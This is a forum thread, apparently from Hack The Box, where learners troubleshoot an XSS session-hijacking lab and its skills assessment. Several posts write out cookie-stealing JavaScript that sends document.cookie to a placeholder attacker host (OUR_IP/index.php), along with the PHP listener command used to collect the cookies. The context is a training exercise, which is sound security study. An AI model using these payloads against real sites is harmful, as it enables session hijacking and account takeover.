Cross Site Scripting - Session Hijacking

Hello all, please again I am coming to you for help I am currently trying to get my PHP server to give my script the file it needs to find the cookie I need I know that might have been a little confusing dm me if you don’t get my question.

Hi bro.

Can you explain again what is the issue? With more details and what you do for solve it, pls. To know what and why you’re stuck.

I finally got the flag but I am stuck again LOL!!! I am stuck on the skills assessment. Please help!

Ok I dont know what I’m doing wrong. I got the php server set up. I sent my pay load:


I put it in the Full Name, User Name, and Image from individually and separate and I keep getting blocked. I get activity on the server. I’m just not getting the cookie.

I’ve been hitting my head against this for a couple of days.

Have the php server running and I’m getting the first link back to my web server (http://myIP/script.js)
But that script isn’t opening my index.php file

I’ve tried having document.location=‘http://OUR_IP/index.php?c=’+document.cookie;
and the new Image().src=‘http://OUR_IP/index.php?c=’+document.cookie;

and without the script tags with no luck either way.

Is the trick to get this to work some silly quote issue or how can I see why the 2nd call to index.php not going out?

Nevermind . The magic was posting here.

Didn’t use “script.js” as a filename + making sure OUR_IP was actually changed. Maybe some other stuff but eventually got the index.php to be called.

i said that i cant find the right payload
already tried all those listed ones…
i sent whit my tun address but they dont request my php or nc server neither.


1 Like

I’m getting the same as @paulorcsjr . I’ve very carefully done every single step according to the steps laid out in the write up. I think the backend of HTB is broken. Is there a way to work around the broken infrastructure? The scripts written for this exercise on the backend are failing and won’t let anyone properly finish this section.


Hey guys! need some help too, please!
I was able to found the correct payload and got the following result:

no idea why it didn’t connect to the index.php page after to get the cookie.

ps: not sure why is apearing this “(null)” after '/script.js" on the server log, the code in the file is the:

new Image().src='http://OUR_IP/index.php?c='+document.cookie

And i changed for the VM ip

found it.

i finally got it… finding the payload took so much time from me even though it turned out that it is one of the six payloads mentioned in the module (the third one ) hope this help and I think we need to learn more about black boxing pt​:smiling_face_with_tear::+1:

1 Like

give me payload plaese I stuck 3 day

It seems that my issue was similar to yours. I asked ChatGPT for advice and received multiple answers, but the one that allowed me to successfully obtain the cookie was the last answer: “Additionally, make sure to check the port you set on your listening server. In your description, you mentioned using port 520 (sudo php -S ), but in the XSS payload, you did not specify the port ("><script src=""></script> ). Please ensure that you add the correct port in the XSS payload, as shown below: "><script src=""></script> . Therefore, please make sure that the listening port and the port in the script tag are consistent.”


You manage to solve this?

I’m having trouble finding which field is even vulnerable. I did

on each field (replacing the our_ip and field name) and getting nothin on my listener. Any help appreciated. Thanks

Be careful!!

Don’t use the same port as you used before to test for the payload - i kept the port also for the script.js but there was never performed a second call. After playing around i incremented the port with 1 and afterwards the second call reached me finally - seems a little bit buggy the webserver.

1 Like

Did you try start again from the beginning? I had a problem with this but after I started a new instance of PwnBox and made a new PHP server using the instructions provided (except I used port 88 instead of 80 because it was taken) it finally worked.

1 Like

use port 88 instead 80 in index.php
and script.js use port 88 instead 80 too

and then URL form use

last listening in port 88
sudo php -S OUR_IP:88
final enter script in url form and orther input normal

specify the ip of the virtual machine and also the port (in the script.js) ejem:
new Image().src=‘http://OUR_IP:PORT/index.php?c=’+document.cookie
with the specified port you will get response from the PHP file.
I hope you understand, my English is still not very good

this helped me get the the answer . tq tomm